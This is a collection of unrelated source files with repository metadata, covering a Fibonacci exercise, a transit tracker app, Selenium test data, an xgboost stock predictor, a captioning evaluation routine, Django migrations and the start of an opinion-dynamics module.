e843a52df42cbe564b8befaa6a35a6e9d894953f | 437e905d8c214dc25c559b1dc03eaf9f0c85326f | /is28/konnov28/python1/Python1/12.py | aa50468a81e6cdc274f644138376969256de9952 | [] | no_license | AnatolyDomrachev/karantin | 542ca22c275e39ef3491b1c0d9838e922423b5a9 | 0d9f60207e80305eb713fd43774e911fdbb9fbad | refs/heads/master | 2021-03-29T03:42:43.954727 | 2020-05-27T13:24:36 | 2020-05-27T13:24:36 | 247,916,390 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | n = int(input("Введите натуральное n: "))
f_prev = 1
f_prev_prev = 1
print("Число Фибоначчи под номером ", 0, " = ", 1)
if n > 0:
print("Число Фибоначчи под номером ", 1, " = ", 1)
for i in range(2, n + 1):
f_current = f_prev + f_prev_prev
print("Число Фибоначчи под номером ", i, " = ", f_current)
f_prev_prev = f_prev
f_prev = f_current
| [
"you@example.com"
] | you@example.com |
473c45e3b9efe6e1f6479df4a0b96666c50ec289 | e6bcb1d409e9227bbab1954a74edeeb4efae97ae | /main.py | 675bbe5121d2dfa9cd2f6d48e249fe30a9ffa6c6 | [] | no_license | keanulee/muni-tracker | fdbb3c1e0de1f2af2e2507ab79207783ac15b75b | 972bbb6fc77e6dc78f09f796ec81d361d348235c | refs/heads/master | 2021-08-02T00:56:53.436712 | 2021-07-22T21:45:18 | 2021-07-22T21:45:18 | 110,642,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,361 | py | import webapp2
import urllib2
import time
import json
from wsgiref.handlers import format_date_time
def formatValue(x):
return {
'arrayValue': {
'values': [
{ 'stringValue': x['routeTag'] },
{ 'geoPointValue': {
'latitude': x['lat'],
'longitude': x['lon'],
} },
{ 'integerValue': int(x['heading']) },
{ 'doubleValue': float(x['speedKmHr']) },
{ 'booleanValue': x['predictable'] == 'true' },
{ 'integerValue': int(x['secsSinceReport']) },
{ 'stringValue': x['dirTag'] if 'dirTag' in x else '' },
{ 'stringValue': x['leadingVehicleId'] if 'leadingVehicleId' in x else '' }
]
}
}
def flattenValue(x):
if 'mapValue' in x:
return {k: flattenValue(v) for k, v in x['mapValue']['fields'].items()}
if 'arrayValue' in x:
return map(flattenValue, x['arrayValue']['values'])
if 'geoPointValue' in x:
return [x['geoPointValue']['latitude'], x['geoPointValue']['longitude']]
if 'stringValue' in x:
return x['stringValue']
if 'integerValue' in x:
return int(x['integerValue'])
if 'doubleValue' in x:
return x['doubleValue']
if 'booleanValue' in x:
return x['booleanValue']
def flattenDocument(doc):
return flattenValue({ 'mapValue': doc })
class FetchHandler(webapp2.RequestHandler):
def get(self):
now = int(time.time())
url = 'http://webservices.nextbus.com/service/publicJSONFeed?command=vehicleLocations&a=sf-muni'
result = urllib2.urlopen(url)
data = json.loads(result.read())
trains = filter(lambda x: x['routeTag'] in ['J', 'KJ', 'KT', 'L', 'LK', 'M', 'N', 'S', 'T', 'TM', 'JBUS', 'KBUS', 'LBUS', 'MBUS', 'NBUS', 'SBUS', 'TBUS'], data['vehicle'])
body = json.dumps({
'fields': {
'd': { 'integerValue': now },
't': {
'mapValue': {
'fields': {v['id']: formatValue(v) for i, v in enumerate(trains)}
}
}
}
}, separators=(',', ':'))
req = urllib2.Request('https://firestore.googleapis.com/v1beta1/projects/sfmuni-tracker/databases/(default)/documents/t?documentId=%d' % now)
req.add_header('Content-Type', 'application/json')
urllib2.urlopen(req, body)
req = urllib2.Request('https://firestore.googleapis.com/v1beta1/projects/go-dashboard-2ff4e/databases/(default)/documents/t?documentId=%d' % now)
req.add_header('Content-Type', 'application/json')
urllib2.urlopen(req, body)
self.response.headers['content-type'] = 'application/json'
self.response.write(body)
class THandler(webapp2.RequestHandler):
def get(self):
url = 'https://firestore.googleapis.com/v1beta1/projects/go-dashboard-2ff4e/databases/(default)/documents/t?%s' % self.request.query_string
result = urllib2.urlopen(url)
data = json.loads(result.read())
data['documents'] = map(flattenDocument, data['documents'])
expires = data['documents'][0]['d'] + 60
self.response.headers['access-control-allow-origin'] = 'https://keanulee.github.io'
self.response.headers['cache-control'] = 'public'
self.response.headers['expires'] = format_date_time(expires)
self.response.headers['content-type'] = 'application/json'
self.response.write(json.dumps(data, separators=(',', ':')))
app = webapp2.WSGIApplication([
('/fetch', FetchHandler),
('/t', THandler),
], debug=True)
| [
"keanulee517@gmail.com"
] | keanulee517@gmail.com |
6256e8c471c987e197b563d2790a1f2a8a49dfc5 | 46357db3b1c1af699384d9cba1ffbc3c732117ad | /selenium_advanced/herokuapp/TestData/TestData.py | 1d4b10cd2c77950959e52ecbbc1231a49994dfcd | [] | permissive | khanhdodang/automation-training-python | 28fbd70ca4bc84e47cf17d1e4702513863e38c44 | b16143961cee869c7555b449e2a05abeae2dc3b5 | refs/heads/master | 2023-07-11T05:21:34.495851 | 2021-08-18T01:29:37 | 2021-08-18T01:29:37 | 285,208,030 | 0 | 8 | MIT | 2020-09-29T07:01:15 | 2020-08-05T07:01:46 | Python | UTF-8 | Python | false | false | 223 | py | class TestData():
BASE_URL = "https://the-internet.herokuapp.com/login"
USERNAME = "tomsmith"
FAKE_USERNAME = "khanhdo"
PASSWORD = "SuperSecretPassword!"
FAKE_PASSWORD = "SuperSecretPassword"
BROWSER = "chrome"
| [
"khanhdo.pmp@gmail.com"
] | khanhdo.pmp@gmail.com |
3500c022e88b6b91854a99d93f348129c9df11ba | c577c2383dad59ad33c78d2ba4262c5cc2d46a89 | /src/pred_boosting.py | 1efd7e4110d584f5ee68d26b261be4e53833388f | [] | no_license | swethmandava/stock_prediction | aa070c43aced52c9e70c38d2bfa29a25e401efa5 | 1d966b75869545a774a15bfdfb43cb02a85cd96b | refs/heads/master | 2021-08-23T22:52:34.328710 | 2017-12-06T23:57:25 | 2017-12-06T23:57:25 | 111,018,816 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,507 | py | import xgboost as xgb
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from parse import *
import matplotlib.pyplot as plt
import sys
#Skeleton code for xgboost.
def train(dtrain, dvalid, evallist, params, epochs, early_stopping_iterations):
bst = xgb.train(
params, dtrain, epochs, evallist,
early_stopping_rounds=early_stopping_iterations, verbose_eval=False)
pred = bst.predict(dvalid)
error = (pred - valid_y)
error = np.multiply(error, error)
avg_error = np.sum(error) * 1.0 / error.size
return bst, np.sum(error) * 1.0/error.size
#Perform cross validation for best set of parameters
def cross_validate_train(train_x, valid_x, train_y, valid_y):
dtrain = xgb.DMatrix(train_x, label=train_y)
dvalid = xgb.DMatrix(valid_x, label=valid_y)
params = {}
learning_rates = [0.001, 0.01, 0.05, 0.1]
gammas = [0.001, 0.01, 0.1] #Loss to split further
max_depths = [1, 2, 5, 10] #Maximum depth of tree
subsamples = [0.5, 0.75, 1.0] #percentage of batch to use in each epoch
lambdas = [0, 0.001, 0.01, 0.1, 1, 10] #L2 regularization
alphas = [0, 0.001, 0.01, 0.1, 1, 10] #L1 regularization
params['silent'] = 1
epochs = 10000
early_stopping_iterations = 10
evallist = [(dvalid, 'eval'), (dtrain, 'train')]
best_error = np.inf
best_model = None
best_params = dict(params)
for learning_rate in learning_rates:
for gamma in gammas:
for max_depth in max_depths:
for subsample in subsamples:
for lambda_i in lambdas:
for alpha in alphas:
params['eta'] = learning_rate
params['gamma'] = gamma
params['max_depth'] = max_depth
params['subsample'] = subsample
params['lambda'] = lambda_i
params['alpha'] = alpha
bst, avg_error = train(dtrain, dvalid, evallist,
params, epochs, early_stopping_iterations)
print "Parameters are: ", params
print "Average error is: ", avg_error, "\n"
if avg_error < best_error:
best_params = params
best_error = avg_error
best_model = bst
best_model.save_model('../stock_data/boosting_results/model_0.model')
# xgb.plot_importance(best_model) #plots histogram showing importance of features
# plt.show()
# xgb.plot_tree(bst, num_trees=5) #plots 2 trees
#There are a ton more parameters we could experiment with here
# xgboost.readthedocs.io/en/latest/parameter.html
return bst, best_params
def incremental_train(x, y, valid_x, valid_y, model, params, model_name):
dupdate = xgb.DMatrix(x, label=y)
dvalid = xgb.DMatrix(valid_x, label=valid_y)
evallist = [(dvalid, 'eval'), (dupdate, 'train')]
model = xgb.train(params, dupdate, 1, xgb_model=model_name)
return model
if __name__ == '__main__':
filename = 'stock_data/Stocks/aple.us.txt'
data_x, data_y, stream, _ = get_data(filename, initial_size=300)
valid_split_ratio = 0.1
#Splits in a chronological manner
[num_samples, num_features] = data_x.shape
index_split = int((1-valid_split_ratio) * num_samples)
train_x = data_x[:index_split, :]
train_y = data_y[:index_split]
valid_x = data_x[index_split:, :]
valid_y = data_y[index_split:]
#Trains Prior Model
# model, params = cross_validate_train(train_x, valid_x, train_y, valid_y)
params = {'silent': 1, 'subsample': 1.0, 'eta': 0.1, 'alpha': 10, 'max_depth': 10, 'gamma': 0.1, 'lambda': 10}
model = xgb.Booster({'nthread':4})
model.load_model("../stock_data/boosting_results/model_0.model")
if model is None:
print "Model incorrect"
sys.exit()
time_series_y = []
time_series_pred_y = []
#Streaming Data:
print params
params["eta"] = 2 * params["eta"] #Give more weightage to new data
day = 0
model_name = '../stock_data/boosting_results/model_'+str(day)+".model"
try:
while True:
new_x,new_y = stream.next()
x = valid_x[[0], :]
y = valid_y[[0]]
valid_x = np.roll(valid_x, -1, axis=0)
valid_y = np.roll(valid_y, -1, axis=0)
valid_x[-1, :] = new_x
valid_y[-1] = new_y
dtest = xgb.DMatrix(x)
y_pred = model.predict(dtest)
time_series_y.append(y)
time_series_pred_y.append(y_pred)
model = incremental_train(x, y, valid_x, valid_y, model, params, model_name)
day = day + 1
model_name = '../stock_data/boosting_results/model_'+str(day)+".model"
model.save_model(model_name)
prev_x = x
prev_y = y
except StopIteration:
pass
np.save("../stock_data/boosting_results/time_series_y", time_series_y)
np.save('../stock_data/boosting_results/time_series_pred_y', time_series_pred_y) | [
"sweth.mandava@gmail.com"
] | sweth.mandava@gmail.com |
0402c5f7fc9d223a57e42857d3c22beb1db6578e | fd72c01cb6b3d32995d8e82151d230f805022b9f | /misc/eval_utils.py | 9f064f6827c67dc3930f7380ea1b5cd0c037f793 | [
"MIT"
] | permissive | zokooo/Sub-GC | 1093a51bb19a30283803d0e72fe4264e34a18b37 | b99ede5163be8378d56b834a66b702b23a76e4e2 | refs/heads/master | 2023-05-25T10:43:29.245025 | 2021-06-16T17:36:52 | 2021-06-16T17:36:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,752 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import json
import random
import time
import os
import sys
import misc.utils as utils
import math
from collections import defaultdict
from misc.sentence_utils import *
from misc.grd_utils import *
random_seed = 2019
np.random.seed(random_seed)
random.seed(random_seed)
def eval_split(model, crit, loader, eval_kwargs={}, opt=None, val_model=None):
'''
This function contains 2 branches:
1. model inference: validation or testing
2. evaluation for input sentences
'''
verbose = eval_kwargs.get('verbose', True)
verbose_beam = eval_kwargs.get('verbose_beam', 1)
verbose_loss = eval_kwargs.get('verbose_loss', 1)
num_images = eval_kwargs.get('num_images', eval_kwargs.get('val_images_use', -1))
split = eval_kwargs.get('split', 'val')
lang_eval = eval_kwargs.get('language_eval', 0)
dataset = eval_kwargs.get('dataset', 'coco')
beam_size = eval_kwargs.get('beam_size', 1)
remove_bad_endings = eval_kwargs.get('remove_bad_endings', 0)
os.environ["REMOVE_BAD_ENDINGS"] = str(remove_bad_endings) # a global configuration
# grounding experiments
return_att_weight = True if eval_kwargs.get('return_att', 0) == 1 else False
if return_att_weight:
assert beam_size == 1, "GVD repo only supports grounding evaluation with beam size as 1"
gvd_all_dict = np.load('data/gvd_all_dict.npy', allow_pickle=True,encoding='latin1').tolist()
ind_to_wd = gvd_all_dict['ind_to_wd']
wd_to_lemma = gvd_all_dict['wd_to_lemma']
lemma_det_id_dict = gvd_all_dict['lemma_det_id_dict']
det_id_to_det_wd = gvd_all_dict['det_id_to_det_wd']
grd_output = defaultdict(list)
model_path = eval_kwargs['infos_path'].split('/')
consensus_rerank_file = model_path[0] + '/' + model_path[1] + '/consensus_rerank_ind.npy'
grd_sGPN_consensus = True if os.path.isfile(consensus_rerank_file) else False
# controllability experiments
sct_mode = True if eval_kwargs.get('sct', 0) == 1 else False
n = 0
loss = 0
loss_sum = 0
loss_evals = 1e-8
predictions = []
# 1. run model in inference mode
if model is not None:
model.eval()
loader.reset_iterator(split)
while True:
data = loader.get_batch(split)
n = n + loader.batch_size
if data.get('labels', None) is not None and verbose_loss: # model validation
tmp = [data['fc_feats'], data['att_feats'], data['labels'], data['masks'], data['att_masks'], data['trip_pred'],\
data['obj_dist'], data['obj_box'], data['rel_ind'], data['pred_fmap'], data['pred_dist'],\
data['gpn_obj_ind'], data['gpn_pred_ind'], data['gpn_nrel_ind'],data['gpn_pool_mtx']]
tmp = [_.cuda() if _ is not None else _ for _ in tmp]
fc_feats, att_feats, labels, masks, att_masks, trip_pred, obj_dist, obj_box, rel_ind, pred_fmap, pred_dist,\
gpn_obj_ind, gpn_pred_ind, gpn_nrel_ind, gpn_pool_mtx = tmp
with torch.no_grad():
lang_output, _, _ = model(fc_feats, att_feats, labels, att_masks, trip_pred,\
obj_dist, obj_box, rel_ind, pred_fmap, pred_dist, gpn_obj_ind, gpn_pred_ind, gpn_nrel_ind, gpn_pool_mtx)
loss = crit(lang_output, labels[:,1:], masks[:,1:]).item()
loss_sum += loss # only use validation loss
loss_evals += 1
else: # model testing
tmp = [data['fc_feats'], data['att_feats'], data['labels'], data['masks'], data['att_masks'], data['trip_pred'],\
data['obj_dist'], data['obj_box'], data['rel_ind'], data['pred_fmap'], data['pred_dist'],\
data['gpn_obj_ind'], data['gpn_pred_ind'], data['gpn_nrel_ind'], data['gpn_pool_mtx']]
tmp = [_.cuda() if _ is not None else _ for _ in tmp]
fc_feats, att_feats, labels, masks, att_masks, trip_pred, obj_dist, obj_box, rel_ind, pred_fmap, pred_dist,\
gpn_obj_ind, gpn_pred_ind, gpn_nrel_ind, gpn_pool_mtx = tmp
# send all subgraphs of a image to generate sentences
with torch.no_grad():
if return_att_weight: # grounding experiments
seqq, seqLogprobs, subgraph_score, keep_nms_ind, att_weights = model(fc_feats, att_feats, att_masks, trip_pred,\
obj_dist, obj_box, rel_ind, pred_fmap, pred_dist, gpn_obj_ind, gpn_pred_ind, gpn_nrel_ind, gpn_pool_mtx,\
opt=eval_kwargs, mode='sample')
else:
seqq, seqLogprobs, subgraph_score, keep_nms_ind = model(fc_feats, att_feats, att_masks, trip_pred,\
obj_dist, obj_box, rel_ind, pred_fmap, pred_dist, gpn_obj_ind, gpn_pred_ind, gpn_nrel_ind, gpn_pool_mtx,\
opt=eval_kwargs, mode='sample')
if not sct_mode:
if model.gpn: # sub-graph captioning model
sorted_score, sort_ind = torch.sort(subgraph_score,descending=True)
seq = seqq[sort_ind].data
subgraph_score = sorted_score.data
sorted_subgraph_ind = keep_nms_ind[sort_ind] # the indices are to index sub-graph in original order
else: # model that use full graph
sort_ind = torch.arange(subgraph_score.size(0)).type_as(keep_nms_ind)
seq = seqq.data
sorted_subgraph_ind = keep_nms_ind.data
else: # for show control and tell, order should be same as inputs and thus no sorting
valid_num = int(subgraph_score.size(0) / 2)
seq = seqq.data[:valid_num]
subgraph_score = subgraph_score.data[:valid_num]
sorted_subgraph_ind = keep_nms_ind[:valid_num]
sort_ind = keep_nms_ind[:valid_num].long()
print('\nNo {}:'.format(n))
if beam_size > 1 and verbose_beam:
keep_ind = sort_ind.cpu().numpy()
print('beam seach sentences of image {}:'.format(data['infos'][0]['id']))
for i in np.random.choice(keep_ind, size=1, replace=True):
print('subgraph {}'.format(i))
print('\n'.join([utils.decode_sequence(loader.get_vocab(), _['seq'].unsqueeze(0))[0] for _ in model.done_beams[i]]))
print('--' * 10)
sents = utils.decode_sequence(loader.get_vocab(), seq) # use the first beam which has highest cumulative score
# save best sentence generated by all subgraphs of a image
entry = {'image_id': data['infos'][0]['id'], 'caption': []}
entry['subgraph_score'] = subgraph_score.cpu().numpy()
entry['sorted_subgraph_ind'] = sorted_subgraph_ind.cpu().numpy()
for k, sent in enumerate(sents):
entry['caption'].append(sent)
predictions.append(entry)
if verbose:
best_ind = torch.argmax(subgraph_score).item()
print('keeping {} subgraphs'.format(len(sents)))
print('best subgraph score sentence: \n{}'.format(entry['caption'][best_ind]))
print('--' * 20)
# collect grounding material for grounding evaluation
if return_att_weight:
get_grounding_material(eval_kwargs['infos_path'], data, sents, sorted_subgraph_ind, att_weights, sort_ind, \
wd_to_lemma, lemma_det_id_dict, det_id_to_det_wd, grd_output, \
use_full_graph=not model.gpn, grd_sGPN_consensus=grd_sGPN_consensus)
if data['bounds']['wrapped']:
break
if num_images >= 0 and n >= num_images:
break
# save prediction results
if data.get('labels', None) is not None and verbose_loss: # after model validation, switch back to training mode
model.train()
return loss_sum/loss_evals
else: # after model testing, save generated results
save_path = eval_kwargs['infos_path'].split('/')
if not sct_mode: # sub-graph captioning
np.save(save_path[0] + '/' + save_path[1] + '/' + 'captions_{}.npy'.format(save_path[-1].split('-')[1].split('.')[0]),predictions)
else: # sct mode, controllability experiments
np.save(save_path[0] + '/' + save_path[1] + '/' + 'ctl_captions_{}.npy'.format(save_path[-1].split('-')[1].split('.')[0]),predictions)
if return_att_weight: # grounding experiments
with open(save_path[0] + '/' + save_path[1] + '/' + 'grounding_file.json', 'w') as f:
json.dump({'results':grd_output, 'eval_mode':'gen', 'external_data':{'used':True, 'details':'grounding experiment'}}, f)
# 2. only evaluate the generated sentences
if model is None:
oracle_num = eval_kwargs.get('oracle_num', 1)
sent_cnt = []
align_pred = []
save_path = eval_kwargs['infos_path'].split('/')
predictions = np.load(save_path[0] + '/' + save_path[1] + '/' + 'captions_{}.npy'.format(\
save_path[-1].split('-')[1].split('.')[0]), allow_pickle=True,encoding='latin1').tolist()
for p_i in range(len(predictions)):
sent_cnt.append(len(predictions[p_i]['caption']))
entry = {'image_id': predictions[p_i]['image_id'], 'caption': predictions[p_i]['caption'][:oracle_num]}
if len(entry['caption']) < oracle_num: # if subgraphs aren't engough
for p_j in range(oracle_num)[len(entry['caption']):]:
entry['caption'].append(predictions[p_i]['caption'][0]) # pad with first sentence
assert len(entry['caption']) == oracle_num
align_pred.append(entry)
if lang_eval == 1:
language_eval(dataset, align_pred, eval_kwargs['id'], split, save_path, \
is_flickr='coco' not in eval_kwargs['input_label_h5']) | [
"yzhong52@wisc.edu"
] | yzhong52@wisc.edu |
f0c03d3a5c771a559f64c228a83b0cd4f9ad034e | 40b4be3cb16cf88e50a090270ab454bfa6c45867 | /caminus/minecraft/migrations/0005_auto__add_playersession.py | 40540598421c33c546f3eff44b4f44ec39871b78 | [] | no_license | caminus/caminus | b497f0030dfb2a20b552df8bfb441eaa0fa5f0ae | 84c269ebb9ce61552a6bcb512c4d251ad4161b58 | refs/heads/master | 2021-01-04T02:37:24.524819 | 2015-02-10T06:23:06 | 2015-02-10T06:23:06 | 3,491,381 | 0 | 0 | null | 2017-07-21T00:05:25 | 2012-02-20T06:40:06 | Python | UTF-8 | Python | false | false | 6,249 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'PlayerSession'
db.create_table('minecraft_playersession', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('server', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['minecraft.Server'])),
('player', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['minecraft.MinecraftProfile'])),
('ip', self.gf('django.db.models.fields.IPAddressField')(max_length=15)),
('start', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('end', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
))
db.send_create_signal('minecraft', ['PlayerSession'])
def backwards(self, orm):
# Deleting model 'PlayerSession'
db.delete_table('minecraft_playersession')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'minecraft.minecraftprofile': {
'Meta': {'object_name': 'MinecraftProfile'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mc_username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'minecraft.motd': {
'Meta': {'object_name': 'MOTD'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'server': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['minecraft.Server']"}),
'text': ('django.db.models.fields.TextField', [], {})
},
'minecraft.playersession': {
'Meta': {'object_name': 'PlayerSession'},
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'player': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['minecraft.MinecraftProfile']"}),
'server': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['minecraft.Server']"}),
'start': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'minecraft.server': {
'Meta': {'object_name': 'Server'},
'hostname': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'port': ('django.db.models.fields.IntegerField', [], {'default': '25565'}),
'query_port': ('django.db.models.fields.IntegerField', [], {'default': '25565'}),
'ruleset': ('django.db.models.fields.TextField', [], {'default': "''"})
}
}
complete_apps = ['minecraft']
| [
"tdfischer@fedoraproject.org"
] | tdfischer@fedoraproject.org |
1e247e40b554c06842ab2469383a40cab085ab2f | 1a8c0c2e93dfa67b48551a162093e4b727dfe8b2 | /courses/migrations/0020_auto__add_field_course_is_active.py | f4664d9ae9da0862279aaacce855ffaaee33c2f1 | [] | no_license | regisb/fun-apps | 7342d605dd61e167560c9505aad63ec00d0552b7 | f7db27c9a43b2f7fc4e1c522534f2549ab52fe0c | refs/heads/dev | 2021-05-24T02:21:55.876764 | 2015-12-08T14:00:42 | 2015-12-08T14:29:26 | 47,678,160 | 2 | 0 | null | 2015-12-09T08:21:47 | 2015-12-09T08:21:47 | null | UTF-8 | Python | false | false | 5,480 | py | # -*- coding: utf-8 -*-
from south.db import db
from south.v2 import SchemaMigration
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Course.is_active'
db.add_column('courses_course', 'is_active',
self.gf('django.db.models.fields.BooleanField')(default=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Course.is_active'
db.delete_column('courses_course', 'is_active')
models = {
'courses.course': {
'Meta': {'ordering': "('-score',)", 'object_name': 'Course'},
'end_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_new': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'level': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'on_demand': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'score': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'subjects': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'courses'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['courses.CourseSubject']"}),
'universities': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'courses'", 'symmetrical': 'False', 'through': "orm['courses.CourseUniversityRelation']", 'to': "orm['universities.University']"})
},
'courses.coursesubject': {
'Meta': {'ordering': "('-score', 'name', 'id')", 'object_name': 'CourseSubject'},
'description': ('ckeditor.fields.RichTextField', [], {'blank': 'True'}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'score': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'})
},
'courses.courseuniversityrelation': {
'Meta': {'ordering': "('order', 'id')", 'object_name': 'CourseUniversityRelation'},
'course': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'related_universities'", 'to': "orm['courses.Course']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'university': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'related_courses'", 'to': "orm['universities.University']"})
},
'universities.university': {
'Meta': {'ordering': "('-score', 'id')", 'object_name': 'University'},
'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'certificate_logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'description': ('ckeditor.fields.RichTextField', [], {'blank': 'True'}),
'detail_page_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'dm_api_key': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'dm_user_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['universities.University']"}),
'score': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255', 'blank': 'True'})
}
}
complete_apps = ['courses']
| [
"regis@behmo.com"
] | regis@behmo.com |
3db4a83754e02e122fc2cd1b8bdeb19351c5c4ac | bddd590d1dbd082052bc733c04de0d90cb74952c | /TurnerSmaldinoFunctions.py | 77788c3d9b5cf581bdbae3dbb401175b03a5a2fc | [] | no_license | heraldkorsen/TSvsDF | 9c001c540cc62b02913184b1514eae1cedb7a6dd | 62057a1663de03c4742a69671bf7ab79b5d56fdc | refs/heads/main | 2023-08-15T00:09:27.438215 | 2021-09-28T15:25:02 | 2021-09-28T15:25:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,178 | py | import defSim as ds
import networkx as nx
import warnings
import random
import numpy as np
from defSim import NewTiesModifier
# custom initializer in which initial range can be varied
class RandomContinuousScaledInitializer(ds.RandomContinuousInitializer):
